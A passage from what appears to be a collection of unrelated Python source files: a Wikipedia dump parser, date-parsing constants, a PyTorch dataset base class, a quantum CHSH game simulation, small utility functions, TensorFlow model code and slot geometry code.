else:
lines = text.split('\n')
for line in lines:
if not line.startswith('{{redirect|'):
break
else:
line = line[11:]
line = line[:line.find('|')]
if len(line) > 0:
if not any(line.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) and not line.lower().startswith('list of'):
self.redirects[line] = self.title
if (__name__ == "__main__"):
title2Id = {}
id2Title = {}
redirects = {}
config = json.load(open('config/config.json'))
wikipath = config['wikipath']
outputpath = config['outputpath']
dictionarypath = outputpath + 'dictionaries/'
mode = 0o755
os.mkdir(outputpath, mode)
os.mkdir(dictionarypath, mode)
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_namespaces, 0)
Handler = WikiHandler(title2Id,id2Title,redirects)
parser.setContentHandler(Handler)
parser.parse(wikipath)
print('done')
with open(dictionarypath + 'title2Id.json', 'w') as f:
json.dump(title2Id, f)
with open(dictionarypath + 'id2Title.json', 'w') as f:
json.dump(id2Title, f)
with open(dictionarypath + 'redirects.json', 'w') as f:
json.dump(redirects, f)
|
23778
|
from datetime import datetime, timedelta
from enum import Enum, auto
from dateutil.relativedelta import relativedelta
from .baseclasses import Constant, MethodEnum
from .formulars import days_feb, eastern_calc, thanksgiving_calc, year_start
class ConstantOption(Enum):
TIME_VARIABLE = auto()
DATE_VARIABLE = auto()
YEAR_VARIABLE = auto()
class Constants:
CHRISTMAS = Constant('christmas', ['xmas'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=25))
HOLY_EVE = Constant('holy eve', options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=24))
SILVESTER = Constant('silvester', ['new years eve'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=31))
EASTERN = Constant('eastern', ['easter'], options=[ConstantOption.YEAR_VARIABLE], time_value=eastern_calc)
NICHOLAS = Constant('nicholas', ['nicholas day'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=6))
HALLOWEEN = Constant('halloween', options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=10, day=31))
APRIL_FOOLS_DAY = Constant('april fools day', ['april fool day'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=4, day=1))
THANKSGIVING = Constant('thanksgiving', options=[ConstantOption.YEAR_VARIABLE], time_value=thanksgiving_calc)
SAINT_PATRICKS_DAY = Constant('saint patrick\'s day',
['saint patricks day', 'st. patrick\'s day', 'saint pt. day', 'st patrick\'s day', 'st patricks day'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=3, day=17))
VALENTINES_DAY = Constant('valentines day', ['valentine', 'valentine day'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=2, day=14))
PI_DAY = Constant("pi day", ["piday", "pi-day"], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=3, day=14))
TAU_DAY = Constant("tau day", ["tauday", "tau-day"], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=6, day=28))
SUMMER_BEGIN = Constant('summer begin', ['summer', 'begin of summer', 'begin of the summer'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=6, day=1))
WINTER_BEGIN = Constant('winter begin', ['winter', 'begin of winter', 'begin of the winter'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=1))
SPRING_BEGIN = Constant('spring begin', ['spring', 'begin of spring', 'begin of the spring'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=3, day=1))
FALL_BEGIN = Constant('fall begin',
['fall', 'begin of fall', 'begin of the fall', 'autumn begin', 'autumn', 'begin of autumn',
'begin of the autumn'],
options=[ConstantOption.YEAR_VARIABLE], time_value=lambda year_time: datetime(year=year_time, month=9, day=1))
SUMMER_END = Constant('summer end', ['end of summer', 'end of the summer'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=8, day=31, hour=23, minute=59, second=59))
WINTER_END = Constant('winter end', ['end of winter', 'end of the winter'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=2, day=days_feb(year_time), hour=23, minute=59,
second=59))
SPRING_END = Constant('spring end', ['end of spring', 'end of the spring'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=5, day=31, hour=23, minute=59, second=59))
FALL_END = Constant('fall end', ['end of fall', 'end of the fall', 'autumn end', 'end of autumn', 'end of the autumn'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=11, day=30, hour=23, minute=59, second=59))
MORNING = Constant('morning', ['at morning'],
options=[ConstantOption.YEAR_VARIABLE, ConstantOption.DATE_VARIABLE])
EVENING = Constant('evening', ['at evening'],
options=[ConstantOption.YEAR_VARIABLE, ConstantOption.DATE_VARIABLE])
LUNCHTIME = Constant('lunchtime', ['lunch'], options=[ConstantOption.YEAR_VARIABLE, ConstantOption.DATE_VARIABLE])
    # advent of code always starts at midnight 1st December in EST (5 hours negative UTC offset)
BEGIN_AOC = Constant('aoc begin',
['aoc', 'begin of aoc', 'begin of the aoc', 'advent of code begin', 'advent of code', 'begin of advent of code',
'begin of the advent of code'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=1, hour=0),
offset=-5)
END_AOC = Constant('aoc end',
['end of aoc', 'end of the aoc', 'advent of code end', 'end of advent of code', 'end of the advent of code'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=26, hour=0),
offset=-5)
END_OF_YEAR = Constant('end of year', ['the end of year', 'the end of the year', 'end of the year'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=31, hour=23, minute=59, second=59))
BEGIN_OF_YEAR = Constant('begin of year', ['the begin of year', 'the begin of the year', 'begin of the year'],
options=[ConstantOption.YEAR_VARIABLE], time_value=year_start)
INFINITY = Constant('infinity', ['inf'], value=None)
TODAY = Constant('today', options=[ConstantOption.TIME_VARIABLE],
time_value=lambda _: datetime(datetime.today().year, datetime.today().month, datetime.today().day))
TOMORROW = Constant('tomorrow', options=[ConstantOption.TIME_VARIABLE],
time_value=lambda _: datetime(datetime.today().year, datetime.today().month, datetime.today().day) + relativedelta(
days=1))
YESTERDAY = Constant('yesterday', options=[ConstantOption.TIME_VARIABLE],
time_value=lambda _: datetime(datetime.today().year, datetime.today().month, datetime.today().day) - relativedelta(
days=1))
NOW = Constant('now', ['at the moment', 'current time', 'current time now'], time_value=lambda _: datetime.now())
ALL = [
CHRISTMAS, HOLY_EVE, SILVESTER, EASTERN, NICHOLAS, HALLOWEEN, APRIL_FOOLS_DAY, THANKSGIVING, SAINT_PATRICKS_DAY, VALENTINES_DAY,
PI_DAY, TAU_DAY,
SUMMER_END, WINTER_END, SPRING_END, FALL_END, SUMMER_BEGIN, WINTER_BEGIN, SPRING_BEGIN, FALL_BEGIN,
MORNING, EVENING, LUNCHTIME,
BEGIN_AOC, END_AOC,
END_OF_YEAR, BEGIN_OF_YEAR,
INFINITY,
TODAY, TOMORROW, YESTERDAY, NOW
]
ALL_RELATIVE_CONSTANTS = [TODAY, TOMORROW, YESTERDAY, NOW]
class DatetimeDeltaConstants:
# time_value is a tuple containing (hours, minutes, seconds)
MIDNIGHT = Constant('midnight', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (0, 0, 0))
NIGHT = Constant('night', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (21, 0, 0))
MORNING_NIGHT = Constant('morning night', value=0, options=[ConstantOption.DATE_VARIABLE],
time_value=lambda _: (3, 0, 0))
DAYLIGHT_CHANGE = Constant('daylight change', ['daylight saving', 'daylight saving time'], value=0,
options=[ConstantOption.YEAR_VARIABLE, ConstantOption.DATE_VARIABLE],
time_value=lambda _: (6, 0, 0))
SUNRISE = Constant('sunrise', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (7, 0, 0))
MORNING = Constant('morning', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (6, 0, 0))
BREAKFAST = Constant('breakfast', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (8, 0, 0))
MIDDAY = Constant('midday', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (12, 0, 0))
LUNCH = Constant('lunch', ['lunchtime'], value=12, options=[ConstantOption.DATE_VARIABLE],
time_value=lambda _: (12, 0, 0))
AFTERNOON = Constant('afternoon', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (15, 0, 0))
EVENING = Constant('evening', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (18, 0, 0))
DINNER = Constant('dinner', ['dinnertime'], value=12, options=[ConstantOption.DATE_VARIABLE],
time_value=lambda _: (19, 0, 0))
DAWN = Constant('dawn', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (6, 0, 0))
DUSK = Constant('dusk', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (20, 0, 0))
SUNSET = Constant('sunset', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (18, 30, 0))
ALL = [
MORNING, AFTERNOON, EVENING, NIGHT, MORNING_NIGHT, DAYLIGHT_CHANGE, MIDNIGHT, MIDDAY, DAWN, DUSK,
SUNRISE, SUNSET, LUNCH, DINNER, BREAKFAST
]
class NumberConstants:
# Presented to you by github copilot
ONE = Constant('one', value=1)
TWO = Constant('two', value=2)
THREE = Constant('three', value=3)
FOUR = Constant('four', value=4)
FIVE = Constant('five', value=5)
SIX = Constant('six', value=6)
SEVEN = Constant('seven', value=7)
EIGHT = Constant('eight', value=8)
NINE = Constant('nine', value=9)
TEN = Constant('ten', value=10)
ELEVEN = Constant('eleven', value=11)
TWELVE = Constant('twelve', value=12)
THIRTEEN = Constant('thirteen', value=13)
FOURTEEN = Constant('fourteen', value=14)
FIFTEEN = Constant('fifteen', value=15)
SIXTEEN = Constant('sixteen', value=16)
SEVENTEEN = Constant('seventeen', value=17)
EIGHTEEN = Constant('eighteen', value=18)
NINETEEN = Constant('nineteen', value=19)
TWENTY = Constant('twenty', value=20)
TWENTY_ONE = Constant('twenty one', alias=["twentyone", "twenty-one"], value=21)
TWENTY_TWO = Constant('twenty two', alias=["twentytwo", "twenty-two"], value=22)
TWENTY_THREE = Constant('twenty three', alias=["twentythree", "twenty-three"], value=23)
TWENTY_FOUR = Constant('twenty four', alias=["twentyfour", "twenty-four"], value=24)
TWENTY_FIVE = Constant('twenty five', alias=["twentyfive", "twenty-five"], value=25)
TWENTY_SIX = Constant('twenty six', alias=["twentysix", "twenty-six"], value=26)
TWENTY_SEVEN = Constant('twenty seven', alias=["twentyseven", "twenty-seven"], value=27)
TWENTY_EIGHT = Constant('twenty eight', alias=["twentyeight", "twenty-eight"], value=28)
TWENTY_NINE = Constant('twenty nine', alias=["twentynine", "twenty-nine"], value=29)
THIRTY = Constant('thirty', value=30)
THIRTY_ONE = Constant('thirty one', alias=["thirtyone", "thirty-one"], value=31)
# Reversed to avoid conflicts with other constants (one is included in twenty one)
ALL = [ONE, TWO, THREE, FOUR, FIVE, SIX, SEVEN, EIGHT, NINE, TEN,
ELEVEN, TWELVE, THIRTEEN, FOURTEEN, FIFTEEN, SIXTEEN, SEVENTEEN, EIGHTEEN, NINETEEN, TWENTY,
TWENTY_ONE, TWENTY_TWO, TWENTY_THREE, TWENTY_FOUR, TWENTY_FIVE, TWENTY_SIX, TWENTY_SEVEN, TWENTY_EIGHT, TWENTY_NINE,
THIRTY, THIRTY_ONE][::-1]
class NumberCountConstants:
# Presented to you by github copilot
FIRST = Constant('first', alias=['1st', '1.'], value=1)
SECOND = Constant('second', alias=['2nd', '2.'], value=2)
THIRD = Constant('third', alias=['3rd', '3.'], value=3)
FOURTH = Constant('fourth', alias=['4th', '4.'], value=4)
FIFTH = Constant('fifth', alias=['5th', '5.'], value=5)
SIXTH = Constant('sixth', alias=['6th', '6.'], value=6)
SEVENTH = Constant('seventh', alias=['7th', '7.'], value=7)
EIGHTH = Constant('eighth', alias=['8th', '8.'], value=8)
NINTH = Constant('ninth', alias=['9th', '9.'], value=9)
TENTH = Constant('tenth', alias=['10th', '10.'], value=10)
ELEVENTH = Constant('eleventh', alias=['11th', '11.'], value=11)
TWELFTH = Constant('twelfth', alias=['12th', '12.'], value=12)
THIRTEENTH = Constant('thirteenth', alias=['13th', '13.'], value=13)
FOURTEENTH = Constant('fourteenth', alias=['14th', '14.'], value=14)
FIFTEENTH = Constant('fifteenth', alias=['15th', '15.'], value=15)
SIXTEENTH = Constant('sixteenth', alias=['16th', '16.'], value=16)
SEVENTEENTH = Constant('seventeenth', alias=['17th', '17.'], value=17)
EIGHTEENTH = Constant('eighteenth', alias=['18th', '18.'], value=18)
NINETEENTH = Constant('nineteenth', alias=['19th', '19.'], value=19)
TWENTIETH = Constant('twentieth', alias=['20th', '20.'], value=20)
TWENTY_FIRST = Constant('twenty first', alias=['21st', '21.', 'twentyfirst', 'twenty-first'], value=21)
TWENTY_SECOND = Constant('twenty second', alias=['22nd', '22.', 'twentysecond', 'twenty-second'], value=22)
TWENTY_THIRD = Constant('twenty third', alias=['23rd', '23.', 'twentythird', 'twenty-third'], value=23)
TWENTY_FOURTH = Constant('twenty fourth', alias=['24th', '24.', 'twentyfourth', 'twenty-fourth'], value=24)
TWENTY_FIFTH = Constant('twenty fifth', alias=['25th', '25.', 'twentyfifth', 'twenty-fifth'], value=25)
TWENTY_SIXTH = Constant('twenty sixth', alias=['26th', '26.', 'twentysixth', 'twenty-sixth'], value=26)
TWENTY_SEVENTH = Constant('twenty seventh', alias=['27th', '27.', 'twentyseventh', 'twenty-seventh'], value=27)
TWENTY_EIGHTH = Constant('twenty eighth', alias=['28th', '28.', 'twentyeighth', 'twenty-eighth'], value=28)
TWENTY_NINTH = Constant('twenty ninth', alias=['29th', '29.', 'twentyninth', 'twenty-ninth'], value=29)
THIRTIETH = Constant('thirtieth', alias=['30th', '30.'], value=30)
    THIRTY_FIRST = Constant('thirty first', alias=['31st', '31.', 'thirtyfirst', 'thirty-first'], value=31)
# Reversed to avoid conflicts with other constants
ALL = [FIRST, SECOND, THIRD, FOURTH, FIFTH, SIXTH, SEVENTH, EIGHTH, NINTH, TENTH,
ELEVENTH, TWELFTH, THIRTEENTH, FOURTEENTH, FIFTEENTH, SIXTEENTH, SEVENTEENTH, EIGHTEENTH, NINETEENTH, TWENTIETH,
TWENTY_FIRST, TWENTY_SECOND, TWENTY_THIRD, TWENTY_FOURTH, TWENTY_FIFTH, TWENTY_SIXTH, TWENTY_SEVENTH, TWENTY_EIGHTH,
TWENTY_NINTH,
THIRTIETH, THIRTY_FIRST][::-1]
class DatetimeConstants:
SECONDS = Constant('seconds', ['second', 'sec', 'secs'])
MINUTES = Constant('minutes', ['minute', 'min', 'mins'])
QUARTERS = Constant('quarters', ['quarter', 'qtr', 'qtrs'])
HOURS = Constant('hours', ['hour'])
DAYS = Constant('days', ['day'])
WEEKS = Constant('weeks', ['week'])
MONTHS = Constant('months', ['month'])
YEARS = Constant('years', ['year'])
OLYMPIADS = Constant('olympiads', ['olympiad']) # 4 years
DECADES = Constant('decades', ['decade']) # 10 years
CENTURIES = Constant('centuries', ['century']) # 100 years
MILLENNIUMS = Constant('millenniums', ['millennium']) # 1,000 years
MEGAANNUMS = Constant('megaannuums', ['megaannuum']) # 1,000,000 years
GIGAANNUMS = Constant('gigaannuums', ['gigaannuum']) # 1,000,000,000 years
TIME = [SECONDS, MINUTES, QUARTERS, HOURS]
DATE = [DAYS, WEEKS, MONTHS, YEARS, DECADES, CENTURIES, MILLENNIUMS, MEGAANNUMS, GIGAANNUMS]
ALL = [*DATE, *TIME]
@classmethod
def convert_from_mini_date(cls, md):
if md.lower() == "s":
return cls.SECONDS
elif md.lower() == "m":
return cls.MINUTES
elif md.lower() == "h":
return cls.HOURS
elif md.lower() == "w":
return cls.WEEKS
elif md.lower() == "d":
return cls.DAYS
elif md.lower() == "y":
return cls.YEARS
class WeekdayConstants:
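    # time_value maps a date to the next occurrence of that weekday on or after the given date (weekday() == 0 is Monday)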
MONDAY = Constant('monday', time_value=lambda date: f"{date + timedelta((0 - date.weekday()) % 7)}")
TUESDAY = Constant('tuesday', time_value=lambda date: f"{date + timedelta((1 - date.weekday()) % 7)}")
WEDNESDAY = Constant('wednesday', time_value=lambda date: f"{date + timedelta((2 - date.weekday()) % 7)}")
THURSDAY = Constant('thursday', time_value=lambda date: f"{date + timedelta((3 - date.weekday()) % 7)}")
FRIDAY = Constant('friday', time_value=lambda date: f"{date + timedelta((4 - date.weekday()) % 7)}")
SATURDAY = Constant('saturday', time_value=lambda date: f"{date + timedelta((5 - date.weekday()) % 7)}")
SUNDAY = Constant('sunday', time_value=lambda date: f"{date + timedelta((6 - date.weekday()) % 7)}")
ALL = [MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY, SUNDAY]
class MonthConstants:
JANUARY = Constant('january', ['jan'], time_value=lambda year_time: datetime(year=year_time, month=1, day=1))
FEBRUARY = Constant('february', ['feb'], time_value=lambda year_time: datetime(year=year_time, month=2, day=1))
MARCH = Constant('march', ['mar'], time_value=lambda year_time: datetime(year=year_time, month=3, day=1))
APRIL = Constant('april', ['apr'], time_value=lambda year_time: datetime(year=year_time, month=4, day=1))
MAY = Constant('may', time_value=lambda year_time: datetime(year=year_time, month=5, day=1))
JUNE = Constant('june', ['jun'], time_value=lambda year_time: datetime(year=year_time, month=6, day=1))
JULY = Constant('july', ['jul'], time_value=lambda year_time: datetime(year=year_time, month=7, day=1))
AUGUST = Constant('august', ['aug'], time_value=lambda year_time: datetime(year=year_time, month=8, day=1))
SEPTEMBER = Constant('september', ['sep'], time_value=lambda year_time: datetime(year=year_time, month=9, day=1))
OCTOBER = Constant('october', ['oct'], time_value=lambda year_time: datetime(year=year_time, month=10, day=1))
NOVEMBER = Constant('november', ['nov'], time_value=lambda year_time: datetime(year=year_time, month=11, day=1))
DECEMBER = Constant('december', ['dec'], time_value=lambda year_time: datetime(year=year_time, month=12, day=1))
ALL = [JANUARY, FEBRUARY, MARCH, APRIL, MAY, JUNE, JULY, AUGUST, SEPTEMBER, OCTOBER, NOVEMBER, DECEMBER]
class Keywords:
OF = Constant('of')
AFTER = Constant('after')
BEFORE = Constant('before')
NEXT = Constant('next')
IN = Constant('in')
FOR = Constant('for')
PAST = Constant('past')
ALL = [OF, AFTER, BEFORE, NEXT, IN, FOR, PAST]
class Method:
ABSOLUTE_PREPOSITIONS = MethodEnum('absolute_prepositions')
ABSOLUTE_DATE_FORMATS = MethodEnum('absolute_date_formats')
CONSTANTS = MethodEnum('constants')
CONSTANTS_RELATIVE_EXTENSIONS = MethodEnum('constants_relative_extensions')
DATETIME_DELTA_CONSTANTS = MethodEnum('datetime_delta_constants')
RELATIVE_DATETIMES = MethodEnum('relative_datetimes')
|
23808
|
import torch
import random
from torch.utils.data import Dataset, DataLoader
from abc import ABC
from models.base_model import Model
from torch.utils.tensorboard import SummaryWriter
from typing import List
class BaseDataset(Dataset, ABC):
name = 'base'
def __init__(self, config: dict, mode: str = 'train'):
self.config = config
self.mode = mode
self.device = config['device']
self.data_dim = config['data_dim']
self.summary_name = self.name
'''
Note that dataset's __getitem__() returns (x_coord, x_feat, y_coord, y_feat, name)
    but the collated batch has type (SparseTensorWrapper, SparseTensorWrapper)
'''
def __getitem__(self, idx) \
-> (torch.tensor, torch.tensor, torch.tensor, torch.tensor, List[str]):
# sparse tensor and tensor should have equal size
        raise NotImplementedError
def __iter__(self):
while True:
idx = random.randint(0, len(self) - 1)
yield self[idx]
def collate_fn(self, batch: List) -> dict:
# convert list of dict to dict of list
batch = {k: [d[k] for d in batch] for k in batch[0]}
return batch
def evaluate(self, model: Model, writer: SummaryWriter, step):
training = model.training
model.eval()
data_loader = DataLoader(
self,
batch_size=self.config['eval_batch_size'],
num_workers=self.config['num_workers'],
collate_fn=self.collate_fn,
drop_last=False,
)
print('')
eval_losses = []
for eval_step, data in enumerate(data_loader):
mode = self.mode
if len(self.config['eval_datasets']) != 1:
mode += '_' + self.summary_name
eval_loss = model.evaluate(data, step, mode)
eval_losses.append(eval_loss)
print('\r[Evaluating, Step {:7}, Loss {:5}]'.format(
eval_step, '%.3f' % eval_loss), end=''
)
print('')
model.write_dict_summaries(step)
model.train(training)
def test(self, model: Model, writer: SummaryWriter, step):
raise NotImplementedError()
def visualize(self, model: Model, options: List, step):
training = model.training
model.eval()
# fix vis_indices
vis_indices = self.config['vis']['indices']
if isinstance(vis_indices, int):
# sample data points from n data points with equal interval
n = len(self)
vis_indices = torch.linspace(0, n - 1, vis_indices).int().tolist()
# override to the index when in overfitting debug mode
if isinstance(self.config['overfit_one_ex'], int):
vis_indices = torch.tensor([self.config['overfit_one_ex']])
for option in options:
# calls the visualizing function
if hasattr(model, option):
getattr(model, option)(self, vis_indices, step)
else:
raise ValueError(
'model {} has no method {}'.format(
model.__class__.__name__, option
)
)
model.train(training)
def visualize_test(self, model: Model, writer: SummaryWriter, step):
training = model.training
model.eval()
# fix vis_indices
vis_indices = self.config['vis']['indices']
if isinstance(vis_indices, int):
# sample data points from n data points with equal interval
vis_indices = torch.linspace(0, len(self) - 1, vis_indices).int().tolist()
# override to the index when in overfitting debug mode
if isinstance(self.config['overfit_one_ex'], int):
vis_indices = torch.tensor([self.config['overfit_one_ex']])
model.visualize_test(self, vis_indices, step)
model.train(training)
|
23819
|
import random
from qlazy import QState
def classical_strategy(trials=1000):
win_cnt = 0
for _ in range(trials):
# random bits by Charlie (x,y)
x = random.randint(0,1)
y = random.randint(0,1)
# response by Alice (a)
a = 0
# response by Bob (b)
b = 0
# count up if win
if (x and y) == (a+b)%2:
win_cnt += 1
print("== result of classical strategy (trials:{0:d}) ==".format(trials))
print("* win prob. = ", win_cnt/trials)
def quantum_strategy(trials=1000):
win_cnt = 0
for _ in range(trials):
# random bits by Charlie (x,y)
x = random.randint(0,1)
y = random.randint(0,1)
# make entangled 2 qubits (one for Alice and another for Bob)
qs = QState(2).h(0).cx(0,1)
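        # H on qubit 0 followed by CNOT prepares the Bell state (|00> + |11>)/sqrt(2)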
# response by Alice (a)
if x == 0:
# measurement of Z-basis (= Ry(0.0)-basis)
sa = qs.m([0], shots=1, angle=0.0, phase=0.0).lst
if sa == 0:
a = 0
else:
a = 1
else:
# measurement of X-basis (or Ry(0.5*PI)-basis)
sa = qs.mx([0], shots=1).lst
# sa = qs.m([0], shots=1, angle=0.5, phase=0.0).lst
if sa == 0:
a = 0
else:
a = 1
# response by Bob (b)
if y == 0:
# measurement of Ry(0.25*PI)-basis
sb = qs.m([1], shots=1, angle=0.25, phase=0.0).lst
if sb == 0:
b = 0
else:
b = 1
else:
# measurement of Ry(-0.25*PI)-basis
sb = qs.m([1], shots=1, angle=-0.25, phase=0.0).lst
if sb == 0:
b = 0
else:
b = 1
# count up if win
if (x and y) == (a+b)%2:
win_cnt += 1
print("== result of quantum strategy (trials:{0:d}) ==".format(trials))
print("* win prob. = ", win_cnt/trials)
if __name__ == '__main__':
classical_strategy()
quantum_strategy()
|
23822
|
from decimal import Decimal
def ensure_decimal(value):
return value if isinstance(value, Decimal) else Decimal(value)
|
23855
|
class Solution:
def bitwiseComplement(self, N: int, M = 0, m = 0) -> int:
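        # M grows as 2**m - 1 (0, 1, 3, 7, ...); once it is an all-ones mask covering N, N ^ M flips every bit of N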
return N ^ M if M and M >= N else self.bitwiseComplement(N, M + 2 ** m, m + 1)
|
23859
|
from .gradient_reversal import GradientReversal
from .noise import Noise, AdditiveNoise, MultiplicativeNoise
|
23884
|
import tensorflow as tf
import numpy as np
import math
# Parameter
order_num=2;
class Program:
def __init__(self,sess,state_dim,obj_num,fea_size,Theta,program_order,postfix):
self.sess = sess;
self.state_dim = state_dim;
self.fea_size=fea_size;
self.obj_num=obj_num;
self.order_num=order_num;
self.Theta=Theta;
self.program_order=program_order;
self.postfix=postfix;
self.p = self.compile_order();
def compile_order(self):
self.Theta=tf.reshape(self.Theta,[-1,self.obj_num,6]);
self.Theta=tf.transpose(self.Theta,perm=[0,2,1]);
self.Theta=tf.unstack(self.Theta,6,1);
# temporary ordering
p_1=tf.multiply(self.Theta[0],self.Theta[3]);
p_1=p_1+self.Theta[5];
p_2=tf.multiply(self.Theta[1],self.Theta[3]);
p_2=p_2+self.Theta[5];
p_3=tf.multiply(self.Theta[0],self.Theta[4]);
p_3=p_3+self.Theta[5];
p_4=tf.multiply(self.Theta[1],self.Theta[4]);
p_4=p_4+self.Theta[5];
program_order2=tf.unstack(self.program_order,(self.obj_num-1),1);
p=tf.multiply(tf.stack([program_order2[0]]*(self.obj_num),1),p_1)+tf.multiply(tf.stack([program_order2[1]]*(self.obj_num),1),p_2)+tf.multiply(tf.stack([program_order2[2]]*(self.obj_num),1),p_3)+tf.multiply(tf.stack([program_order2[3]]*(self.obj_num),1),p_4);
        # Currently tf.cond causes problems
"""
program_order2=tf.unstack(self.program_order,self.order_num,1);
for i in range(self.order_num):
program_order2[i]=tf.unstack(program_order2[i],3,1);
for i in range(self.order_num):
for k in range(9):
for l in range(k+1,9):
# not=1, and=2, or=3
p=tf.cond(tf.equal(program_order2[i][0],1)&tf.equal(program_order2[i][1],k),lambda:1-self.Theta[k],lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],1)&tf.equal(program_order2[i][1],-1),lambda:1-p,lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],2)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:tf.multiply(self.Theta[k],self.Theta[l]),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],2)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],-1),lambda:tf.multiply(self.Theta[k],p),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],3)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:self.Theta[k]+self.Theta[l]-tf.multiply(self.Theta[k],self.Theta[l]),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],3)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:self.Theta[k]+p-tf.multiply(self.Theta[k],p),lambda:p);
"""
return p;
def run_target_nets(self,Theta,program_order):
Theta=tf.reshape(Theta,[-1,self.obj_num,6]);
Theta=tf.transpose(Theta,perm=[0,2,1]);
Theta=tf.unstack(Theta,6,1);
# temporary ordering
p_1=tf.multiply(Theta[0],Theta[3]);
p_1=p_1+Theta[5];
p_2=tf.multiply(Theta[1],Theta[3]);
p_2=p_2+Theta[5];
p_3=tf.multiply(Theta[0],Theta[4]);
p_3=p_3+Theta[5];
p_4=tf.multiply(Theta[1],Theta[4]);
p_4=p_4+Theta[5];
program_order2=tf.unstack(program_order,(self.obj_num-1),1);
p=tf.multiply(tf.stack([program_order2[0]]*(self.obj_num),1),p_1)+tf.multiply(tf.stack([program_order2[1]]*(self.obj_num),1),p_2)+tf.multiply(tf.stack([program_order2[2]]*(self.obj_num),1),p_3)+tf.multiply(tf.stack([program_order2[3]]*(self.obj_num),1),p_4);
        # Currently tf.cond causes problems
"""
# Currently tf.cond makes problems
program_order2=tf.unstack(program_order,self.order_num,1);
for i in range(self.order_num):
program_order2[i]=tf.unstack(program_order2[i],3,1);
for i in range(self.order_num):
for k in range(9):
for l in range(k+1,9):
# not=1, and=2, or=3
p=tf.cond(tf.equal(program_order2[i][0],1)&tf.equal(program_order2[i][1],k),lambda:1-Theta[k],lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],1)&tf.equal(program_order2[i][1],-1),lambda:1-p,lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],2)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:tf.multiply(Theta[k],Theta[l]),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],2)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],-1),lambda:tf.multiply(Theta[k],p),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],3)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:Theta[k]+Theta[l]-tf.multiply(Theta[k],Theta[l]),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],3)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:Theta[k]+p-tf.multiply(Theta[k],p),lambda:p);
"""
return p;
|
23908
|
from numpy import exp, pi, cos, sin, tan
from ....Functions.Geometry.inter_line_circle import inter_line_circle
def _comp_point_coordinate(self):
"""Compute the point coordinates needed to plot the Slot.
Parameters
----------
self : HoleM51
A HoleM51 object
Returns
-------
point_dict: dict
A dict of the slot coordinates
"""
Rext = self.get_Rext()
# comp point coordinate (in complex)
alpha = self.comp_alpha()
Wslot = 2 * sin(self.W1 / 2) * (Rext - self.H1)
L = 0.5 * (Wslot - self.W0) / cos(alpha) # ||P2,P5||
# Center of the hole
Z0 = Rext - self.H0
Z2 = Z0 + 1j * self.W0 / 2
Z25 = Z0 - 1j * self.W0 / 2
Z15 = Z25 - self.H2
Z1 = Z2 - 1j * self.W2
Z26 = Z1 - 1j * self.W3
Z12 = Z2 - self.H2
Z13 = Z12 - 1j * self.W2
Z14 = Z13 - 1j * self.W3
Z11 = Z12 + 1j * tan(alpha / 2) * self.H2
